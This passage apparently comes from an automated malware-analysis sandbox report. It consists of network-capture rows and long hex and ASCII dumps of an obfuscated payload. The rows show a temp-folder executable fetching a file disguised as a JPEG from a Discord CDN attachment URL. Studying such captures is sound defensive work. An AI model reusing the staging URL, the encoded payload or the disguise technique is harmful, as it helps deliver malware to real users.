DD O qqm O DW O DW O DW O DW O DW O DW O DD O DX O DW O Eq O WD O DW O MX O Xq O DD O qqM O DW O Eq O DM O DW O qOO O DW O DW O WO O DW O DX O Xq O DW O EE O DW O DW O mX O DW O DX O qOp O DW O EE O DW O DW
2021-10-29 18:50:00 UTC	879	IN	Data Raw: 20 58 4f 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 4d 45 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 6d 70 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 58 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 71 4f 58 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 44 57 20 Data Ascii: XO O qOp O DW O DW O DW O DX O qqM O DW O ME O Xq O DD O mX O DW O Eq O XW O DW O MX O Xq O DW O mp O DW O DW O mX O DW O DE O qOp O DW O DW O DW O DW O DW O DW O XO O DW O DW O qOX O DW O EJ O EE O DW O XO O qOp O DW O qOX O DW O EJ O EE O DW O XO O DW
2021-10-29 18:50:00 UTC	895	IN	Data Raw: 44 20 4f 20 4d 4f 20 4f 20 58 44 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 71 4f 4f 20 4f 20 71 4f 58 20 4f 20 71 4f 4f 20 4f 20 45 4f 20 4f 20 44 44 20 4f 20 71 4a 71 20 4f 20 4d 58 20 4f 20 57 4f 20 4f 20 45 58 20 4f 20 71 4f 58 20 4f 20 4d 4d 20 4f 20 57 71 20 4f 20 45 58 20 4f 20 58 57 20 4f 20 4d 45 20 4f 20 58 45 20 4f 20 6d 4d 20 4f 20 71 4f 58 20 4f 20 4d 4d 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 57 71 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 4f 45 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 4f 70 20 4f 20 44 44 20 4f 20 71 4a 4a 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 58 4d 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 71 71 45 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 Data Ascii: D O MO O XD O MM O DW O DW O DM O qOO O qOX O qOO O EO O DD O qJq O MX O WO O EX O qOX O MM O Wq O EX O XW O ME O XE O mM O qOX O MM O qqM O DD O Wq O DW O Eq O qOE O DW O MX O qOp O DD O qJJ O DW O EJ O Xq O DW O XM O Xq O DW O qqE O DW O Eq O Xq O DW O
2021-10-29 18:50:00 UTC	911	IN	Data Raw: 20 4f 20 71 4f 4a 20 4f 20 71 4f 4f 20 4f 20 57 4f 20 4f 20 45 58 20 4f 20 71 4a 4a 20 4f 20 4d 45 20 4f 20 58 45 20 4f 20 45 58 20 4f 20 71 71 44 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 6d 4d 20 4f 20 71 71 4d 20 4f 20 45 6d 20 4f 20 71 71 44 20 4f 20 58 4d 20 4f 20 58 45 20 4f 20 71 4a 4f 20 4f 20 71 71 57 20 4f 20 4d 58 20 4f 20 57 4f 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 71 4f 70 20 4f 20 44 58 20 4f 20 71 4f 4f 20 4f 20 57 4f 20 4f 20 45 58 20 4f 20 71 4a 4a 20 4f 20 71 4f 4f 20 4f 20 45 71 20 4f 20 57 45 20 4f 20 6d 4d 20 4f 20 4d 58 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 71 4f 4d 20 4f 20 6d 4d 20 4f 20 71 4f 58 20 4f 20 4d 58 20 4f 20 58 45 20 4f 20 45 58 20 Data Ascii: O qOJ O qOO O WO O EX O qJJ O ME O XE O EX O qqD O MM O DW O DW O DW O mM O qqM O Em O qqD O XM O XE O qJO O qqW O MX O WO O EE O DW O DW O DX O qOp O DX O qOO O WO O EX O qJJ O qOO O Eq O WE O mM O MX O DW O DX O MM O DW O qOM O mM O qOX O MX O XE O EX
2021-10-29 18:50:00 UTC	927	IN	Data Raw: 71 20 4f 20 44 44 20 4f 20 58 6d 20 4f 20 58 45 20 4f 20 45 4f 20 4f 20 71 71 4d 20 4f 20 58 44 20 4f 20 57 4f 20 4f 20 71 4f 58 20 4f 20 71 71 45 20 4f 20 4d 4f 20 4f 20 45 71 20 4f 20 57 45 20 4f 20 57 71 20 4f 20 58 57 20 4f 20 45 71 20 4f 20 57 45 20 4f 20 71 71 4a 20 4f 20 4d 58 20 4f 20 71 71 4f 20 4f 20 58 4a 20 4f 20 71 4a 4a 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 58 4a 20 4f 20 57 4f 20 4f 20 58 44 20 4f 20 6d 58 20 4f 20 58 4a 20 4f 20 44 4d 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 45 57 20 4f 20 71 4f 70 20 4f 20 45 6d 20 4f 20 58 70 20 4f 20 4d 4f 20 4f 20 58 45 20 4f 20 71 4a 4f 20 4f 20 71 4f 58 20 4f 20 58 4d 20 4f 20 58 58 20 4f 20 45 58 20 4f 20 71 4f 58 20 4f 20 58 4a 20 4f 20 44 4d 20 4f 20 45 45 20 4f 20 Data Ascii: q O DD O Xm O XE O EO O qqM O XD O WO O qOX O qqE O MO O Eq O WE O Wq O XW O Eq O WE O qqJ O MX O qqO O XJ O qJJ O DW O DW O qqM O DD O XJ O WO O XD O mX O XJ O DM O EE O DW O EW O qOp O Em O Xp O MO O XE O qJO O qOX O XM O XX O EX O qOX O XJ O DM O EE O
2021-10-29 18:50:00 UTC	943	IN	Data Raw: 20 71 4f 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 44 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 45 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 71 4f 70 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 71 71 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 45 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 71 71 20 4f 20 44 44 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 45 44 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 44 Data Ascii: qOE O DW O DW O DW O DW O qOp O DD O DW O DE O DW O EW O qOp O DW O DW O DW O DX O qOp O DM O DW O Ep O DW O qqW O DW O DW O DW O DW O XW O DW O Xq O DW O qOp O DE O mX O DW O DW O DW O DD O qqq O DD O DW O DE O DW O ED O qqM O DW O DW O DW O Ep O DW O D
2021-10-29 18:50:00 UTC	959	IN	Data Raw: 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 57 4a 20 4f 20 4d 58 20 4f 20 58 4a 20 4f 20 57 4a 20 4f 20 57 70 20 4f 20 71 4f 57 20 4f 20 57 45 20 4f 20 44 57 20 4f 20 57 70 20 4f 20 71 4f 57 20 4f 20 57 45 20 4f 20 44 Data Ascii: O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O WJ O MX O XJ O WJ O Wp O qOW O WE O DW O Wp O qOW O WE O D
2021-10-29 18:50:00 UTC	975	IN	Data Raw: 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 57 57 20 4f 20 45 71 20 4f 20 58 57 20 4f 20 71 4f 70 20 4f 20 71 4f 70 20 4f 20 45 70 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 57 57 20 4f 20 4d 4d 20 4f 20 58 70 20 4f 20 45 6d 20 4f 20 57 4a 20 4f 20 71 4f 4d 20 4f 20 71 71 71 20 4f 20 57 70 20 4f 20 57 4a 20 4f 20 71 4f 4d 20 4f 20 71 71 71 20 4f 20 57 70 20 4f 20 57 4a 20 4f 20 71 4f 4d 20 4f 20 71 71 71 20 4f 20 57 70 20 4f 20 71 4f 70 20 4f 20 45 70 20 4f 20 44 45 20 Data Ascii: O WD O DW O mE O mE O WD O DW O mE O mE O WD O DW O mE O mE O WD O DW O mE O mE O WD O DW O mE O mE O WD O DW O WW O Eq O XW O qOp O qOp O Ep O DE O DW O WW O MM O Xp O Em O WJ O qOM O qqq O Wp O WJ O qOM O qqq O Wp O WJ O qOM O qqq O Wp O qOp O Ep O DE
2021-10-29 18:50:00 UTC	991	IN	Data Raw: 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 57 45 20 4f 20 45 45 20 4f 20 71 4a 71 20 4f 20 71 71 44 20 4f 20 57 4a 20 4f 20 57 57 20 4f 20 71 4a 71 20 4f 20 71 4f 58 20 4f 20 57 4a 20 4f 20 57 57 20 4f 20 71 4a 71 20 4f 20 71 4f 58 20 4f 20 57 4a 20 4f 20 57 57 20 4f 20 71 4a 71 20 4f 20 71 4f 58 20 4f 20 57 4a 20 4f 20 57 57 20 4f 20 71 4a 71 20 4f 20 71 4f 58 Data Ascii: O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O WE O EE O qJq O qqD O WJ O WW O qJq O qOX O WJ O WW O qJq O qOX O WJ O WW O qJq O qOX O WJ O WW O qJq O qOX

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49804	162.159.130.233	443	C:\Users\user\AppData\Local\Temp\69B.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-29 18:50:00 UTC	1000	OUT	GET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1 Host: cdn.discordapp.com
2021-10-29 18:50:00 UTC	1001	IN	HTTP/1.1 200 OK Date: Fri, 29 Oct 2021 18:50:00 GMT Content-Type: image/jpeg Content-Length: 257637 Connection: close CF-Ray: 6a5e96473b984a79-FRA Accept-Ranges: bytes Age: 33760 Cache-Control: public, max-age=31536000 ETag: "3943342e1b45e890a729310467090869" Expires: Sat, 29 Oct 2022 18:50:00 GMT Last-Modified: Fri, 29 Oct 2021 09:26:31 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Cf-Bgj: h2pri Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1635499591484284 x-goog-hash: crc32c=wAW+lg== x-goog-hash: md5=OUM0LhtF6JCnKTEEZwkIaQ== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 257637 X-GUploader-UploadID: ADPycdsh_0GH4h67GfM4DXv45AAKX5J9KadQOaoJgeenVA8XggFohgRrUig2qws-RHRUWddueA29G7svcIC2IfMWyq3dEjwegQ X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=loTTfHG5cj4uhEjn%2FppS0YclJHyDeG99VBwvsvS%2FPqiTeDs7dRcs1GuaIS89vZD1yFtE064gAtLwkI4pqFmU4kP%2BquYc7rUWILibDtemi%2FTjhtT3G4O1u7trsuega1Z4MtBumg%3D%3D"}],"group":"cf-nel","max_age":604800}
2021-10-29 18:50:00 UTC	1002	IN	Data Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
2021-10-29 18:50:00 UTC	1002	IN	Data Raw: 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 4f 71 20 4f 20 57 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 58 44 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 4f 71 20 4f 20 57 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 58 44 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 4f 71 20 4f 20 57 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 58 44 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71 Data Ascii: O qqM O mE O WE O XX O qOq O WD O XO O mE O XD O Wq O qqX O DX O mE O mM O qOO O WW O qqM O mE O WE O XX O qOq O WD O XO O mE O XD O Wq O qqX O DX O mE O mM O qOO O WW O qqM O mE O WE O XX O qOq O WD O XO O mE O XD O Wq O qqX O DX O mE O mM O qOO O WW O q
2021-10-29 18:50:00 UTC	1003	IN	Data Raw: 71 4f 4f 20 4f 20 57 57 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 4f 20 4f 20 58 45 20 4f 20 57 4f 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 4f 44 20 4f 20 71 4f 70 20 4f 20 71 71 4d 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 58 6d 20 4f 20 44 45 20 4f 20 6d 58 20 4f 20 4d 4d 20 4f 20 6d 45 20 4f 20 45 71 20 4f 20 58 57 20 4f 20 71 71 4f 20 4f 20 45 58 20 4f 20 71 71 58 20 4f 20 71 4f 4f 20 4f 20 71 4f 57 20 4f 20 45 4a 20 4f 20 44 4d 20 4f 20 58 4f 20 4f 20 71 71 4a 20 4f 20 44 58 20 4f 20 58 71 20 4f 20 58 57 20 4f 20 45 4a 20 4f 20 71 71 4a 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 57 4f 20 4f 20 71 4f 6d 20 4f 20 45 4a 20 4f 20 58 58 20 4f 20 71 71 4f 20 4f 20 6d 45 20 4f 20 71 71 4a 20 4f 20 Data Ascii: qOO O WW O qqM O mE O WE O XO O XE O WO O mE O mp O qOD O qOp O qqM O DX O mE O Xm O DE O mX O MM O mE O Eq O XW O qqO O EX O qqX O qOO O qOW O EJ O DM O XO O qqJ O DX O Xq O XW O EJ O qqJ O qOp O DW O DW O DW O DE O WO O qOm O EJ O XX O qqO O mE O qqJ O
2021-10-29 18:50:00 UTC	1005	IN	Data Raw: 45 20 4f 20 57 70 20 4f 20 57 6d 20 4f 20 71 71 4f 20 4f 20 71 71 57 20 4f 20 58 4f 20 4f 20 57 45 20 4f 20 71 4a 4f 20 4f 20 71 4f 4f 20 4f 20 45 4a 20 4f 20 71 4f 44 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 71 71 45 20 4f 20 71 71 6d 20 4f 20 71 71 70 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 71 20 4f 20 57 6d 20 4f 20 45 4d 20 4f 20 71 4f 44 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d Data Ascii: E O Wp O Wm O qqO O qqW O XO O WE O qJO O qOO O EJ O qOD O mE O mE O mE O mE O mE O mE O Wm O qqE O qqm O qqp O mE O mE O qqq O Wm O EM O qOD O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O m
2021-10-29 18:50:00 UTC	1006	IN	Data Raw: 4f 20 71 71 44 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 71 71 71 20 4f 20 57 4a 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 57 4f 20 4f 20 71 4f 58 20 4f 20 71 4f 57 20 4f 20 58 71 20 4f 20 58 4f 20 4f 20 6d 70 20 4f 20 45 44 20 4f 20 58 58 20 4f 20 71 4f 4d 20 4f 20 45 4a 20 4f 20 6d 45 20 4f 20 45 6d 20 4f 20 58 71 20 4f 20 57 4a 20 4f 20 58 4a 20 4f 20 71 71 4d 20 4f 20 58 71 20 4f 20 71 71 4d 20 4f 20 45 44 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 45 57 20 4f 20 71 4a 71 20 4f 20 45 4d 20 4f 20 58 4d 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 71 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 6d 45 20 4f 20 6d 45 20 Data Ascii: O qqD O qqX O mE O qqq O WJ O EE O DW O mE O WO O qOX O qOW O Xq O XO O mp O ED O XX O qOM O EJ O mE O Em O Xq O WJ O XJ O qqM O Xq O qqM O ED O DW O DX O EW O qJq O EM O XM O qqm O mE O mE O mE O mE O mE O mE O mE O Wq O mE O mE O XO O mE O WE O mE O mE
2021-10-29 18:50:00 UTC	1007	IN	Data Raw: 20 4f 20 57 4a 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 45 57 20 4f 20 71 4f 57 20 4f 20 71 71 71 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 71 71 6d 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 Data Ascii: O WJ O mE O mE O mE O mE O mE O mE O mp O EW O qOW O qqq O qqm O mE O Wm O mp O qqX O qqm O mE O mp O qqX O qqm O Wm O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O
2021-10-29 18:50:00 UTC	1009	IN	Data Raw: 20 4f 20 58 4f 20 4f 20 57 45 20 4f 20 71 4f 4f 20 4f 20 58 71 20 4f 20 71 4f 57 20 4f 20 57 57 20 4f 20 6d 45 20 4f 20 45 45 20 4f 20 71 4f 57 20 4f 20 44 4d 20 4f 20 45 44 20 4f 20 6d 4d 20 4f 20 71 4f 57 20 4f 20 58 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 6d 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 57 57 20 4f 20 71 4f 4f 20 4f 20 45 4a 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 71 4f 71 20 4f 20 71 4f 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 58 45 20 4f 20 71 4a 71 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 44 58 20 4f 20 71 4a 4f 20 4f 20 4d 4d 20 4f 20 45 4a 20 4f 20 6d 45 20 4f 20 71 71 58 20 4f 20 4d 58 20 4f 20 6d 45 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 4f 20 4f 20 71 71 45 20 4f 20 57 57 20 4f Data Ascii: O XO O WE O qOO O Xq O qOW O WW O mE O EE O qOW O DM O ED O mM O qOW O XW O qOp O DW O mX O mE O mM O WW O qOO O EJ O mE O Wm O qOq O qOD O XO O mE O WE O XX O XE O qJq O XO O mE O DX O qJO O MM O EJ O mE O qqX O MX O mE O DX O mE O mp O qqO O qqE O WW O
2021-10-29 18:50:00 UTC	1010	IN	Data Raw: 45 20 4f 20 58 44 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 4f 71 20 4f 20 57 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 58 44 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 4f 71 20 4f 20 57 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 58 44 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 4f 71 20 4f 20 57 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f Data Ascii: E O XD O Wq O qqX O DX O mE O mM O qOO O WW O qqM O mE O WE O XX O qOq O WD O XO O mE O XD O Wq O qqX O DX O mE O mM O qOO O WW O qqM O mE O WE O XX O qOq O WD O XO O mE O XD O Wq O qqX O DX O mE O mM O qOO O WW O qqM O mE O WE O XX O qOq O WD O XO O mE O
2021-10-29 18:50:00 UTC	1011	IN	Data Raw: 6d 45 20 4f 20 45 58 20 4f 20 71 4a 71 20 4f 20 71 71 57 20 4f 20 45 57 20 4f 20 57 57 20 4f 20 71 4f 44 20 4f 20 71 4f 45 20 4f 20 71 4a 4a 20 4f 20 44 44 20 4f 20 58 4d 20 4f 20 71 71 45 20 4f 20 71 4f 45 20 4f 20 71 71 4a 20 4f 20 71 71 70 20 4f 20 45 4a 20 4f 20 6d 45 20 4f 20 71 4f 4a 20 4f 20 58 4d 20 4f 20 44 44 20 4f 20 57 45 20 4f 20 6d 45 20 4f 20 57 71 20 4f 20 71 71 4a 20 4f 20 57 45 20 4f 20 71 4f 4a 20 4f 20 58 4f 20 4f 20 57 45 20 4f 20 57 4a 20 4f 20 71 4f 71 20 4f 20 71 71 4f 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 71 4f 4f 20 4f 20 57 71 20 4f 20 71 71 4a 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 57 71 20 4f 20 45 58 20 4f 20 57 71 20 4f 20 71 4f 71 20 4f 20 58 4f 20 4f 20 6d 70 20 4f 20 57 4a 20 4f 20 71 71 45 20 4f 20 57 44 20 4f 20 58 Data Ascii: mE O EX O qJq O qqW O EW O WW O qOD O qOE O qJJ O DD O XM O qqE O qOE O qqJ O qqp O EJ O mE O qOJ O XM O DD O WE O mE O Wq O qqJ O WE O qOJ O XO O WE O WJ O qOq O qqO O qqm O mE O qOO O Wq O qqJ O Wm O mE O Wq O EX O Wq O qOq O XO O mp O WJ O qqE O WD O X
2021-10-29 18:50:00 UTC	1013	IN	Data Raw: 44 57 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 4d 58 20 4f 20 71 4f 4d 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 71 4f 4d 20 4f 20 57 70 20 4f 20 71 4f 70 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 57 70 20 4f 20 71 71 45 20 4f 20 58 4d 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 4d 58 20 4f 20 71 4f 4d 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 71 4f 4d 20 4f 20 57 70 20 4f 20 71 4f 70 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 57 70 20 4f 20 71 71 45 20 4f 20 58 4d 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 4d 58 20 4f 20 71 4f 4d 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 71 4f 4d 20 4f 20 57 70 20 4f 20 71 4f 70 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 45 20 4f 20 45 45 20 Data Ascii: DW O mE O mp O MX O qOM O DW O XO O mE O qOM O Wp O qOp O DX O mE O Wp O qqE O XM O DW O mE O mp O MX O qOM O DW O XO O mE O qOM O Wp O qOp O DX O mE O Wp O qqE O XM O DW O mE O mp O MX O qOM O DW O XO O mE O qOM O Wp O qOp O DX O mE O mE O mE O qqE O EE
